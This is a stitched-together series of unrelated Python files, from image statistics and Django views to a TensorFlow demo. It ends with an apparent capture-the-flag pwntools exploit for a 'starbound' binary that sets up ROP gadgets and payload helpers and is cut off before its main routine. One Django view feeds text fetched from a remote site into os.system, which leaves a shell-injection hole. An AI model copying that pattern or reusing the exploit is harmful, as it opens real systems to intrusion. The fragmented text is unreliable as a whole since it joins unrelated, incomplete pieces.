tokens = tokens + sent_tokens
tokens = [self.get_prefix() + cluster_dict[t] for t in tokens if t in cluster_dict]
token_dict[rid] = tokens
def main():
pass
if __name__ == '__main__':
main()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#created by liangj
import cv2 as cv
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import sys
import os
def dealWithWhite(inputArray):
output = [];
for height in range(0,inputArray.shape[0]):
for width in range(0,inputArray.shape[1]):
if inputArray[height,width] != 255:
output.append(inputArray[height,width]);
return np.array(output);
def dealOneImage(image):
B = dealWithWhite(image[:,:,0]);
G = dealWithWhite(image[:,:,1]);
R = dealWithWhite(image[:,:,2]);
bmax = B.max();
bmin = B.min();
bmean = B.mean();
gmax = G.max();
gmin = G.min();
gmean = G.mean();
rmax = R.max();
rmin = R.min();60
rmean = R.mean();
print("Blue max min mean %f %f %f"%(bmax,bmin,bmean));
print("Green max min mean %f %f %f"%(gmax,gmin,gmean));
print("Red max min mean %f %f %f"%(rmax,rmin,rmean));
def main(argv):
fileName = "D:\Lymph_Follicle\python\catalog\images";# JF14_091_S8_HE-2.png
folderFullName = "D:\Lymph_Follicle\python\catalog\images";
for parent,dirnames,filenames in os.walk(folderFullName):
for filename in filenames:
# filename = filenames[0];
print(filename+"\n");
image = cv.imread(folderFullName+"\\"+filename);
print(image.shape);
dealOneImage(image);
if __name__ == '__main__':
main(sys.argv) |
from django.contrib.sitemaps import Sitemap
from .models import Musica, Categoria, DiaLiturgico
class MusicaSitemap(Sitemap):
changefreq = "weekly"
priority = 0.6
def items(self):
return Musica.objects.all()
class CategoriaSitemap(Sitemap):
changefreq = "weekly"
priority = 0.5
def items(self):
return Categoria.objects.all()
class DiaLiturgicoSitemap(Sitemap):
changefreq = "weekly"
priority = 0.7
def items(self):
return DiaLiturgico.objects.all()
|
import os
import sys
import numpy as np
import cv2
import pandas as pd
from PIL import Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
from bs4 import BeautifulSoup
from bs4 import Comment
import re
import random
import time
################################################################################
# IMPORTANT INFO (20-02-10 update)
# - use 'output_img_191023' images and 'output_nc_split_191023' for making pages
print('\nHow many pages would you like to make?')
num_pages = int(input())
print('')
print('Delete current pages? [No: 0, Yes: 1]')
delete_decision = int(input())
print('')
# print('How many staffs do you want on a page?')
# num_staffs = int(input())
page_width = 2000
page_height = 3000
top_offset = 200
bottom_offset = 500
margin_left = 200
margin_right = 200
staff_spacing = 100
staff_image = Image.open('fake_staff_lines.png', 'r')
neume_path = 'output_img_191023/'
save_path = 'fake_images/'
save_image_path = save_path + 'img/'
save_meta_path = save_path + 'txt/'
if delete_decision == 1:
os.system(f'rm -rf { save_path }')
elif delete_decision != 0:
sys.exit("Please select 0 or 1")
if not os.path.isdir(save_path):
os.mkdir(save_path)
if not os.path.isdir(save_image_path):
os.mkdir(save_image_path)
if not os.path.isdir(save_meta_path):
os.mkdir(save_meta_path)
neume_info = pd.read_csv('output_nc_split_191023.txt')
neume_info = neume_info.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
# print(neume_info)
staff_width_orig, staff_height_orig = staff_image.size
# df.loc[df['column_name'].isin(some_values)]
neumes = neume_info.loc[~neume_info['type'].isin(['clef.c', 'clef.f', 'custos'])]
clefs = neume_info.loc[neume_info['type'].isin(['clef.c', 'clef.f'])]
custos_arr = neume_info.loc[neume_info['type'] == 'custos']
# print(custos_arr)
staff_scale = 100 / staff_height_orig
# staff_image.thumbnail((staff_width_orig*staff_scale, staff_height_orig*staff_scale), Image.ANTIALIAS)
staff_coords = []
for k in range(num_pages):
blank_image = Image.new('RGBA', (page_width, page_height), (232, 228, 220, 255))
num_staffs = random.randint(10,16)
timestamp = time.strftime("%Y%m%d%H%M%S")
print(f'Making page_{ timestamp } ...')
with open(f'{ save_meta_path }page_{ timestamp }.txt', 'w') as f:
f.write('neume,ulx,uly,lrx,lry\n')
for i in range(num_staffs):
if top_offset + int(0.33 * i * staff_width_orig*staff_scale) > page_height - bottom_offset:
break
neume_name = random.choice(neume_info['file_name'])
neume_image = Image.open(neume_path + neume_name, 'r')
neume_image = neume_image.crop((0,15, neume_image.size[0], neume_image.size[1] - 15))
staff_scale_height = staff_scale * random.uniform(0.93, 1.07)
staff_scale_width = random.uniform(0.97, 1.03)
staff_place = staff_image.resize((int(staff_scale_width * (page_width - margin_left - margin_right)), int(staff_height_orig*staff_scale_height)), Image.ANTIALIAS)
w, h = staff_place.size
pos_offset = int(h / 6)
margin_left_offset = random.randint(-10,10)
blank_image.paste(staff_place, (margin_left + margin_left_offset , top_offset + int(0.33 * i * staff_width_orig*staff_scale)), mask=staff_place)
num_neumes = random.randint(15, 30)
for j in range(num_neumes):
if j == 0: #
choice = clefs.sample(n=1)
choice_file, choice_type = choice.iloc[0]
n_place = random.choice([0, 2, 4])
scale = 2/3 + 0.05
elif j == num_neumes - 1:
choice = custos_arr.sample(n=1)
choice_file, choice_type = choice.iloc[0]
n_place = random.randint(0,8)
scale = 1/3
else:
choice = neumes.sample(n=1)
choice_file, choice_type = choice.iloc[0]
if choice_type == 'oblique2':
n_place = random.randint(0,7)
scale = 1/2
elif choice_type == 'oblique3':
n_place = random.randint(0,6)
scale = 2/3
elif choice_type == 'oblique4':
n_place = random.randint(0,5)
scale = 5/6
else:
n_place = random.randint(0,8)
scale = 1/3
n_image = Image.open(neume_path + choice_file)
n_image = n_image.crop((0,15, n_image.size[0], n_image.size[1] - 15))
n_ratio = n_image.size[0] / n_image.size[1]
new_width = int(scale*h*n_ratio)
new_height = int(scale*h)
n_image = n_image.resize((new_width, new_height), Image.ANTIALIAS)
ulx = margin_left + margin_left_offset + int(j * w / num_neumes)
uly = top_offset + int(0.33 * i * staff_width_orig*staff_scale) + int(-2*pos_offset + n_place*pos_offset) + random.randint(-5,5)
lrx = ulx + new_width
lry = uly + new_height
# 4-TUPLE (IF PROVIDED) is left (ulx), upper (uly), right (lrx), and lower (lry) | first two coords if 2-TUPLE
blank_image.paste(n_image, (ulx, uly))
f.write(f'{ choice_type },{ ulx },{ uly },{ lrx },{ lry }\n')
blank_image.save(save_image_path + f'page_{ timestamp }.png')
# print(w, h, pos_offset)
# blank_image.paste(neume_image, (random.randint(0,page_width), random.randint(0, page_height)))
# blank_image.show()
# cv2.waitKey()
|
# the notebook plugin
# handles notebook creation
import dateutil.parser
import logging
import json
import re
from docx import Document
from espresso.main import robot
from tinydb import where
# the regex used to identify an Announcement message
ANNOUNCEMENT_REGEX = r'(?is)Announcement for (?P<date>\d+/\d+/\d+): (?P<announcement>.*)'
# listen for an announcement
@robot.hear(ANNOUNCEMENT_REGEX)
def got_announcement(res):
# grab out a bunch of things from the regex to add to the db
date = dateutil.parser.parse(res.match.group('date'))
announcement = res.match.group('announcement')
user = res.msg.user.name
# insert everything into the db
# TODO: build a new brain api and refactor?
logging.debug("Got Announcement for date %s: %s", date, announcement)
res.robot.brain.db.insert({"plugin": "notebook", "type": "announcement",
"date": date.isoformat(), "announcement": announcement,
"user": user, "channel": res.msg.channel.name})
# backfill responder
@robot.respond(r'(?i)backfill announcements for (?P<date>\d+/\d+/\d+)')
def backfill_announcements(res):
# pull out the target date from the backfill command
target_date = dateutil.parser.parse(res.match.group('date'))
# grab the entire history of #announcements (rather the last 100 messages) from Slack's api
# this is a raw api call. refactor?
channel_history = json.loads(res.robot.slack_client.api_call('channels.history',
channel=res.robot.slack_client.server.channels.find("announcements").id,
inclusive=1))
# grab the messages from the history dict
channel_message_type_events = channel_history['messages']
# filter out only actual messages, not other subtypes
channel_messages = filter(lambda m: ((m.get('type') == 'message') and ('subtype' not in m)), channel_message_type_events)
# for every message in the history array
for m in channel_messages:
# check if it matches the announcement regex
match = re.search(ANNOUNCEMENT_REGEX, m['text'])
if match:
# pull out a bunch of regex groups
date = dateutil.parser.parse(match.group('date'))
announcement = match.group('announcement')
# grab the user's name from slackclient's user dict
user = res.robot.slack_client.server.users.find(m['user']).name
# if the date is the one the original backfill command specified
if date == target_date:
# insert the announcement into the db
logging.debug("Got Announcement for date %s by user %s: %s",
date, user, announcement)
res.robot.brain.db.insert({"plugin": "notebook", "type": "announcement",
"date": date.isoformat(), "announcement": announcement,
"user": user, "channel": 'announcements'})
# notebook creation responder
@robot.respond(r'(?i)make a (new )?notebook (entry|template) for (?P<date>\d+/\d+/\d+)')
def make_entry(res):
# pull out the target notebook date from the regex
date = dateutil.parser.parse(res.match.group('date'))
logging.debug("new notebook target date: %s", date)
# query the database for announcements from the specified date
# TODO: build a new brain api and refactor?
announcements = res.robot.brain.db.search((where('plugin') == 'notebook')
& (where('type') == 'announcement')
& (where('date') == date.isoformat())
)
logging.debug("announcements are %s", announcements)
# if there actually _are_ announcements for that date
if announcements != []:
document = None
if res.robot.config['plugin_config']['notebook']['append']:
document = Document(res.robot.config['plugin_config']['notebook']['file'])
else:
# create a new docx document object
document = Document()
# fill in a bunch of boilerplate
document.add_page_break()
document.add_heading('{date}, the BEC'.format(date=date.strftime('%m/%d/%Y')), level=1)
document.add_heading('Announcements:', level=2)
# pull out a list of all the users that had announced
users = set(map(lambda a: a['user'], announcements))
logging.debug("users are %s", users)
# for each user who has announced
for user in sorted(users):
# get their real name
real_name = res.robot.slack_client.server.users.find(user).real_name
logging.debug("announcing user %s is %s", user, real_name)
# create a new heading for them
document.add_paragraph("{}:".format(real_name))
# for every one of their posts
for announcement in announcements:
if announcement['user'] == user:
# create a bullet-point for that announcement
document.add_paragraph("{}".format(announcement['announcement']),
style='ListBullet')
# TODO: onedrive
document.save(res.robot.config['plugin_config']['notebook']['file'])
else:
# let the user know that that meeting date doesn't exist
res.reply(res.msg.user, "No announcements for date {}".format(date.strftime('%m/%d/%Y')))
|
# -*- coding: utf-8 -*-
from django.shortcuts import render,HttpResponseRedirect
from modelapp.models import Test,abc,ssr_1
from . import linux_shell,ping,tcp,ssr
from django.contrib.auth.models import auth,User
from django.contrib.auth.decorators import login_required
import requests,base64,os
last_port=1
ip='xx'
def code_haimianbaobao(s):
a=os.system('myqr '+s+' -p C:/Users/Administrator/Desktop/project/ssr_scr/erweima.jpg -d C:/Users/Administrator/Desktop/project/ssr_scr/static/ -n 1.png -c')
print(a)
def add_port(port):#数据库增加数据 ssr_1就代表表名,通过继承model类来完成数据库操作
test1=ssr_1(name=str(port))
test1.save()
def get_last_port():
list = ssr_1.objects.all()#获取所有数据
list_data=[]
for var in list:
list_data.append(var.name)
return list_data[-1]
@login_required(login_url='/login')#修饰需要登录权限的页面
def post(request):#post1代表工具接口 ping和tcp检测
context={}
_ping=ping.ping()
_tcp=tcp.tcp()
if "+" in _ping:
context['cping']=1
else:
context['cping']=0
if "+" in _tcp:
context['ctcp']=1
else:
context['ctcp']=0
context['ping']=_ping
context['tcp']=_tcp
context['port']=get_last_port()
context['ping1']='ping检测:'
context['tcp1']='tcp检测:'
context['port1']='当前端口:'
_t=requests.get('http://cnmf.net.cn/xx.html').text
_t=base64.b64decode(_t).decode()
code_haimianbaobao(_t)
context['haimianbaobao']='/static/1.png'
context['dy'] = _t
context['dy1']='当前地址(订阅已自动更新:cnmf.net.cn/xx.html):'
return render(request,'a.html',context)
text='iptables: Saving firewall rules to /etc/sysconfig/iptables: [ OK ]\r\niptables: Setting chains to policy ACCEPT: filter [ OK ]\r\niptables: Flushing firewall rules: [ OK ]\r\niptables: Unloading modules: [ OK ]\r\niptables: Applying firewall rules: [ OK ]\r\nIPv6 support\nstopped\nStopping ShadowsocksR success\nIPv6 support\nStarting ShadowsocksR success\n'
@login_required(login_url='/login')
def post2(request):#post2更换ip返回数据由ssr制作订阅链接
context={}
_re=linux_shell.main()
add_port(str(_re)[:6])
if text == str(text):
context['cping']=1
context['ping1']='更换成功!'
ssr.main()
_t=requests.get('http://cnmf.net.cn/xx.html').text
_t=base64.b64decode(_t).decode()
code_haimianbaobao(_t)
context['haimianbaobao']='/static/1.png'
context['dy'] = _t
context['dy1']='当前地址(订阅已自动更新:cnmf.net.cn/xx.html):'
else:
context['cping']=0
context['ping1']='更换失败!'
context['ping']=_re
return render(request,'a.html',context)
def post3(request):#post3完成登录操作
if request.method == 'POST':
name = 'admin1'
pwd = request.POST.get('pwd')
print(pwd)
user = auth.authenticate(request,username=name,password=pwd)
if user:
auth.login(request,user)
return HttpResponseRedirect('/')
return HttpResponseRedirect('login.html')
@login_required(login_url='/login')
def hello(request):
context = {}
_t=requests.get('http://cnmf.net.cn/xx.html').text
_t=base64.b64decode(_t).decode()
context['dy'] = _t
code_haimianbaobao(_t)
context['haimianbaobao']='/static/1.png'
context['dy1']='当前地址(订阅已自动更新:cnmf.net.cn/xx.html):'
return render(request, 'a.html', context)
def login(request):
return render(request,'login.html') |
from datetime import datetime
from packaging.version import parse as version_parse
from markupsafe import Markup
from flask import current_app
# //cdnjs.cloudflare.com/ajax/libs/moment.js/2.29.4/moment-with-locales.min.js
default_moment_version = '2.29.4'
default_moment_sri = ('sha512-42PE0rd+wZ2hNXftlM78BSehIGzezNeQuzihiBCvUEB3CVx'
'HvsShF86wBWwQORNxNINlBPuq7rG4WWhNiTVHFg==')
js_code = '''function flask_moment_render(elem) {{
const timestamp = moment(elem.dataset.timestamp);
const func = elem.dataset.function;
const format = elem.dataset.format;
const timestamp2 = elem.dataset.timestamp2;
const no_suffix = elem.dataset.nosuffix;
const units = elem.dataset.units;
let args = [];
if (format)
args.push(format);
if (timestamp2)
args.push(moment(timestamp2));
if (no_suffix)
args.push(no_suffix);
if (units)
args.push(units);
elem.textContent = timestamp[func].apply(timestamp, args);
elem.classList.remove('flask-moment');
elem.style.display = "";
}}
function flask_moment_render_all() {{
const moments = document.querySelectorAll('.flask-moment');
moments.forEach(function(moment) {{
flask_moment_render(moment);
const refresh = moment.dataset.refresh;
if (refresh && refresh > 0) {{
(function(elem, interval) {{
setInterval(function() {{
flask_moment_render(elem);
}}, interval);
}})(moment, refresh);
}}
}})
}}
document.addEventListener("DOMContentLoaded", flask_moment_render_all);'''
class moment(object):
"""Create a moment object.
:param timestamp: The ``datetime`` object representing the timestamp.
:param local: If ``True``, the ``timestamp`` argument is given in the
local client time. In most cases this argument will be set
to ``False`` and all the timestamps managed by the server
will be in the UTC timezone.
"""
@classmethod
def include_moment(cls, version=default_moment_version, local_js=None,
no_js=None, sri=None, with_locales=True):
"""Include the moment.js library and the supporting JavaScript code
used by this extension.
This function must be called in the ``<head>`` section of the Jinja
template(s) that use this extension.
:param version: The version of moment.js to include.
:param local_js: The URL to import the moment.js library from. Use this
option to import the library from a locally hosted
file.
:param no_js: Just add the supporting code for this extension, without
importing the moment.js library. . Use this option if
the library is imported elsewhere in the template. The
supporting JavaScript code for this extension is still
included.
:param sri: The SRI hash to use when importing the moment.js library,
or ``None`` if the SRI hash is unknown or disabled.
:param with_locales: If ``True``, include the version of moment.js that
has all the locales.
"""
mjs = ''
if version == default_moment_version and local_js is None and \
with_locales is True and sri is None:
sri = default_moment_sri
if not no_js:
if local_js is not None:
if not sri:
mjs = '<script src="{}"></script>\n'.format(local_js)
else:
mjs = ('<script src="{}" integrity="{}" '
'crossorigin="anonymous"></script>\n').format(
local_js, sri)
elif version is not None:
if with_locales:
js_filename = 'moment-with-locales.min.js' \
if version_parse(version) >= version_parse('2.8.0') \
else 'moment-with-langs.min.js'
else:
js_filename = 'moment.min.js'
if not sri:
mjs = ('<script src="https://cdnjs.cloudflare.com/ajax/'
'libs/moment.js/{}/{}"></script>\n').format(
version, js_filename)
else:
mjs = ('<script src="https://cdnjs.cloudflare.com/ajax/'
'libs/moment.js/{}/{}" integrity="{}" '
'crossorigin="anonymous"></script>\n').format(
version, js_filename, sri)
return Markup('{}\n<script>\n{}\n</script>\n'''.format(
mjs, cls.flask_moment_js()))
@staticmethod
def locale(language='en', auto_detect=False, customization=None):
"""Configure the moment.js locale.
:param language: The language code.
:param auto_detect: If ``True``, detect the locale from the browser.
:param customization: A dictionary with custom options for the locale,
as needed by the moment.js library.
"""
if auto_detect:
return Markup('<script>\nvar locale = '
'window.navigator.userLanguage || '
'window.navigator.language;\n'
'moment.locale(locale);\n</script>')
if customization:
return Markup(
'<script>\nmoment.locale("{}", {});\n</script>'.format(
language, customization))
return Markup(
'<script>\nmoment.locale("{}");\n</script>'.format(language))
@staticmethod
def flask_moment_js():
"""Return the JavaScript supporting code for this extension.
This method is provided to enable custom configurations that are not
supported by ``include_moment``. The return value of this method is
a string with raw JavaScript code. This code can be added to your own
``<script>`` tag in a template file::
<script>
{{ moment.flask_moment_js() }}
</script>
Alternatively, the code can be returned in a JavaScript endpoint that
can be loaded from the HTML file as an external resource::
@app.route('/flask-moment.js')
def flask_moment_js():
return (moment.flask_moment_js(), 200,
{'Content-Type': 'application/javascript'})
Note: only the code specific to Flask-Moment is included. When using
this method, you must include the moment.js library separately.
"""
default_format = ''
if 'MOMENT_DEFAULT_FORMAT' in current_app.config:
default_format = '\nmoment.defaultFormat = "{}";'.format(
current_app.config['MOMENT_DEFAULT_FORMAT'])
return '''moment.locale("en");{}\n{}'''.format(default_format, js_code)
@staticmethod
def lang(language):
"""Set the language. This is a simpler version of the :func:`locale`
function.
:param language: The language code to use.
"""
return moment.locale(language)
def __init__(self, timestamp=None, local=False):
if timestamp is None:
timestamp = datetime.utcnow()
self.timestamp = timestamp
self.local = local
def _timestamp_as_iso_8601(self, timestamp):
tz = ''
if not self.local:
tz = 'Z'
return timestamp.strftime('%Y-%m-%dT%H:%M:%S' + tz)
def _render(self, func, format=None, timestamp2=None, no_suffix=None,
units=None, refresh=False):
t = self._timestamp_as_iso_8601(self.timestamp)
data_values = 'data-function="{}"'.format(func)
if format:
data_values += ' data-format="{}"'.format(format)
if timestamp2:
data_values += ' data-timestamp2="{}"'.format(timestamp2)
if no_suffix:
data_values += ' data-nosuffix="1"'
if units:
data_values += ' data-units="{}"'.format(units)
return Markup(('<span class="flask-moment" data-timestamp="{}" ' +
'{} data-refresh="{}" ' +
'style="display: none">{}</span>').format(
t, data_values, int(refresh) * 60000, t))
def format(self, fmt=None, refresh=False):
"""Format a moment object with a custom formatting string.
:param fmt: The formatting specification to use, as documented by the
``format()`` function frommoment.js.
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("format", format=(fmt or ''), refresh=refresh)
def fromNow(self, no_suffix=False, refresh=False):
"""Render the moment object as a relative time.
This formatting option is often called "time ago", since it renders
the timestamp using friendly text strings such as "2 hours ago" or
"in 3 weeks".
:param no_suffix: if set to ``True``, the time difference does not
include the suffix (the "ago" or similar).
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("fromNow", no_suffix=int(no_suffix),
refresh=refresh)
def fromTime(self, timestamp, no_suffix=False, refresh=False):
"""Render the moment object as a relative time with respect to a
given reference time.
This function maps to the ``from()`` function from moment.js.
:param timestamp: The reference ``datetime`` object.
:param no_suffix: if set to ``True``, the time difference does not
include the suffix (the "ago" or similar).
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("from", timestamp2=self._timestamp_as_iso_8601(
timestamp), no_suffix=int(no_suffix), refresh=refresh)
def toNow(self, no_suffix=False, refresh=False):
"""Render the moment object as a relative time.
This function renders as the reverse time interval of ``fromNow()``.
:param no_suffix: if set to ``True``, the time difference does not
include the suffix (the "ago" or similar).
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("toNow", no_suffix=int(no_suffix), refresh=refresh)
def toTime(self, timestamp, no_suffix=False, refresh=False):
"""Render the moment object as a relative time with respect to a
given reference time.
This function maps to the ``to()`` function from moment.js.
:param timestamp: The reference ``datetime`` object.
:param no_suffix: if set to ``True``, the time difference does not
include the suffix (the "ago" or similar).
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("to", timestamp2=self._timestamp_as_iso_8601(
timestamp), no_suffix=int(no_suffix), refresh=refresh)
def calendar(self, refresh=False):
"""Render the moment object as a relative time, either to current time
or a given reference timestamp.
This function renders relative time using day references such as
tomorrow, next Sunday, etc.
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("calendar", refresh=refresh)
def valueOf(self, refresh=False):
"""Render the moment object as milliseconds from Unix Epoch.
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("valueOf", refresh=refresh)
def unix(self, refresh=False):
"""Render the moment object as seconds from Unix Epoch.
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("unix", refresh=refresh)
def diff(self, timestamp, units, refresh=False):
"""Render the difference between the moment object and the given
timestamp using the provided units.
:param timestamp: The reference ``datetime`` object.
:param units: A time unit such as `years`, `months`, `weeks`, `days`,
`hours`, `minutes` or `seconds`.
:param refresh: If set to ``True``, refresh the timestamp at one
minute intervals. If set to ``False``, background
refreshing is disabled. If set to an integer, the
refresh occurs at the indicated interval, given in
minutes.
"""
return self._render("diff", timestamp2=self._timestamp_as_iso_8601(
timestamp), units=units, refresh=refresh)
class Moment(object):
def __init__(self, app=None):
if app is not None:
self.init_app(app)
def init_app(self, app):
if not hasattr(app, 'extensions'): # pragma: no cover
app.extensions = {}
app.extensions['moment'] = moment
app.context_processor(self.context_processor)
@staticmethod
def context_processor():
return {
'moment': current_app.extensions['moment']
}
def flask_moment_js(self):
return current_app.extensions['moment'].flask_moment_js()
def create(self, timestamp=None):
return current_app.extensions['moment'](timestamp)
|
from django.db import models
# Create your models here.
class CctvWorldInfo(models.Model):
news_id = models.CharField(max_length=50, default=0, verbose_name='新闻ID')
url = models.CharField(max_length=500, default='', verbose_name='地址链接')
front_image_url = models.CharField(max_length=500, default='', verbose_name='列表图片地址', blank=True, null=True)
content_image_url = models.CharField(max_length=500, default='', verbose_name='内容图片地址', blank=True, null=True)
title = models.CharField(max_length=200, default='', verbose_name='标题')
summary = models.TextField(verbose_name='简介', default='')
label = models.CharField(max_length=50, default='', verbose_name='标签')
from_news = models.CharField(max_length=50, default='CCTV', verbose_name='来源')
content = models.TextField(verbose_name='内容', default='')
release_time = models.CharField(max_length=200, default='0000-00-00 00:00:00')
create_date = models.DateTimeField(auto_now=True, verbose_name="创建时间")
class TouTiaoNewsInfo(models.Model):
news_id = models.CharField(max_length=50, default=0, verbose_name='新闻ID')
url = models.CharField(max_length=500, default='', verbose_name='地址链接')
front_image_url = models.CharField(max_length=500, default='', verbose_name='列表图片地址', blank=True, null=True)
content_image_url = models.CharField(max_length=500, default='', verbose_name='内容图片地址', blank=True, null=True)
title = models.CharField(max_length=200, default='', verbose_name='标题')
label = models.CharField(max_length=50, default='', verbose_name='标签')
from_news = models.CharField(max_length=50, default='', verbose_name='来源')
content = models.TextField(verbose_name='内容', default='')
comment = models.IntegerField(verbose_name='评论数', default=0)
release_time = models.CharField(max_length=200, default='0000-00-00 00:00:00')
create_date = models.DateTimeField(auto_now=True, verbose_name="创建时间")
|
import numpy as np
import timeit
from apr_max_sub_seq_test import measure_times, run_tests
# algorithm with double for loop and prices as list
def get_best_options_double_for(change_rates):
if len(change_rates) == 0:
return 0
prices = np.cumsum(change_rates).tolist()
prices.insert(0, 0)
diff = 0
for (i, price_i) in enumerate(prices):
for j in range(i, len(prices)):
if prices[j] - price_i > diff:
diff = prices[j] - price_i
return diff
# reverse for loop over prices
def jget_best_options_reversed_for(change_rates):
if len(change_rates) == 0:
return 0
prices = np.cumsum(change_rates).tolist()
prices.insert(0, 0)
diff = 0
max_price = prices[-1]
for price in reversed(prices):
if price > max_price:
max_price = price
if max_price - price > diff:
diff = max_price - price
return diff
# reverse for loop over rates
def get_max_span(changes):
max_diff, current_diff = 0, 0
for change in changes:
if current_diff > 0:
current_diff = current_diff + change
else:
current_diff = change
if current_diff > max_diff:
max_diff = current_diff
return max_diff
def max_sub_seq_3_py(data):
max_sum, cur_sum = 0, 0
for change in data:
if cur_sum > 0:
cur_sum = cur_sum + change
else:
cur_sum = change
if cur_sum > max_sum:
max_sum = cur_sum
return max_sum
def get_best_options_reversed_for(changes):
span, price = 0, 0
max_price = changes[-1]
for change in reversed(changes):
price = price - change
if price > max_price:
max_price = price
if max_price - price > span:
span = max_price - price
return span
# run_tests(get_max_span)
# run_tests(get_best_options_reversed_for)
# measure_times(get_max_span)
# measure_times(get_best_options_reversed_for)
|
number=1
aumentador=2520
contador=1
divisor=1
while contador!=20:
if number%divisor==0:
divisor+=1
contador+=1
else:
divisor=1
aumentador+=1
number=aumentador*10
contador=0
print(number)
|
import random, time
class RandomBlocker:#class name is the same as file name
def __init__(self, empty, me, opponent):
self.empty = empty
self.me = me
self.opponent = opponent
self.seed = time.time()
self.board = []
def play(self):
random.seed(self.seed)
self.seed += 1
slots, empties, blocks = self.readboard()
if blocks:
return random.choice(blocks)
if slots:
return random.choice(slots)
return random.choice(empties)
def surrounding(self, x, y):
coords = []
endx, endy = min(x+2,len(self.board)), min(y+2, len(self.board[0]))
for i in range(x-1, endx):
for j in range(y-1, endy):
if self.board[i][j] == self.empty:
coords.append((i, j))
return coords
def readboard(self):
slots, empties, blocks = [], [], []
rng = range(len(self.board))
for x in rng:
for y in rng:
if self.board[x][y] == self.me:
slots.extend(self.surrounding(x, y))
elif self.board[x][y] == self.opponent:
blocks.extend(self.surrounding(x, y))
else:
empties.append((x, y))
return slots, empties, blocks
|
import tensorflow as tf
import numpy as np
## hidden size ##
## seq length ##
## batch_size ##
tf.set_random_seed(777)
h = [1, 0, 0, 0]
e = [0, 1, 0, 0]
l = [0, 0, 1, 0]
o = [0, 0, 0, 1]
# parameter #
hidden_size = 2
sequence_length = 5
batch_size = 3
# RNN building #
cell = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_size, state_is_tuple=True,
reuse=tf.AUTO_REUSE)
x_data = np.array([[h, e, l, l, o],
[e, o, l, l, l],
[l, l, e, e, l]], dtype=np.float32)
#print(x_data)
sess = tf.Session()
outputs, states = tf.nn.dynamic_rnn(cell, x_data, dtype=tf.float32)
sess.run(tf.global_variables_initializer())
print(sess.run(outputs))
sess.close() |
#!/usr/bin/python
# -*- coding: cp936 -*-
import sqlite3
import csv
import xlrd
import xlwt
from SQLiteQuery.simTradeQuery import *
from SQLiteQuery.inertialTestersQuery import *
from SQLiteQuery.kcbActQuery import *
def getSimTradeSheetFromSQLite():
with sqlite3.connect('C:\sqlite\db\hxdata.db') as db:
workbookdes = xlwt.Workbook()
dst1 = workbookdes.add_sheet('sheet1')
dst2 = workbookdes.add_sheet('sheet2')
sq = simTradeQuery()
topusers = sq.getTopSimTradeUsers(30) #返回交易天数前30多的用户手机号,因为还要剔除内部测试人员
iq = inertialTestersQuery()
inertialUsers = iq.getallInertialTestersMobile()
kcb = kcbActQuery()
kcbtopUsers = kcb.getTopSimTradeUsers(30)
'''
三、模拟交易用户
1、N视界仿真账号的使用用户,取交易天数最多的前10名用户(提出内部人员)
2、科创板大赛用户,取交易天数最多的前10名用户
'''
'''
2
'''
dst2.write(0, 0, '科创版大赛用户')
dst2.write(0, 1, '交易天数')
finalTopUsers = {}
count = 0
row = 1
for mobilephone in kcbtopUsers:
if (mobilephone not in inertialUsers) and (mobilephone not in finalTopUsers):
finalTopUsers[mobilephone] = kcbtopUsers[mobilephone] #tradedays
dst2.write(row, 0, mobilephone)
dst2.write(row, 1, kcbtopUsers[mobilephone])
count = count + 1
row = row + 1
else:
print(mobilephone, "is inertialUsers!")
if count == 10:
break
workbookdes.save('../output/simTradeResult.xls')
'''
1
'''
'''
dst1.write(0, 0, '模拟交易用户')
dst1.write(0, 1, '模拟交易天数')
finalTopUsers = {}
count = 0
row = 1
for mobilephone in topusers:
if (mobilephone not in inertialUsers) and (mobilephone not in finalTopUsers):
finalTopUsers[mobilephone] = topusers[mobilephone] #tradedays
dst1.write(row, 0, mobilephone)
dst1.write(row, 1, topusers[mobilephone])
count = count + 1
row = row + 1
else:
print(mobilephone, "is inertialUsers!")
if count == 10:
break
'''
getSimTradeSheetFromSQLite()
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import time
from pwn import *
context.log_level = 'debug'
elf = ELF('./starbound')
# Constants
O_RDONLY = 0
# Memory locations
# .bss
username = 0x80580d0
fp_array = 0x8058154
bin_sh = elf.bss() + 0x100
flag_path = elf.bss() + 0x108
buf = elf.bss() + 0x120
# ROP gadgets
add_esp_0x28_pop_ebx_ret = 0x08049bfe
pop2ret = 0x080498a9 # pop ebx ; pop edi ; ret
pop3ret = 0x080494da # pop ebx ; pop esi ; pop edi ; ret
# Byte sequence alias
A4 = 4 * b'A'
def call_func(func_addr: int, ret_addr: int, argv: list) -> bytes:
payload = p32(func_addr) # ret
payload += p32(ret_addr) # ret addr
for i in range(len(argv)):
payload += p32(argv[i]) # argv[i]
return payload
def set_name(proc, name: bytes):
proc.recvuntil('> ')
proc.send(b'6')
proc.recvuntil('> ')
proc.send(b'2')
proc.recvuntil('Enter your name: ')
proc.sendline(name)
proc.recvuntil('> ')
proc.send(b'1')
def main():
"""
How this program works
===
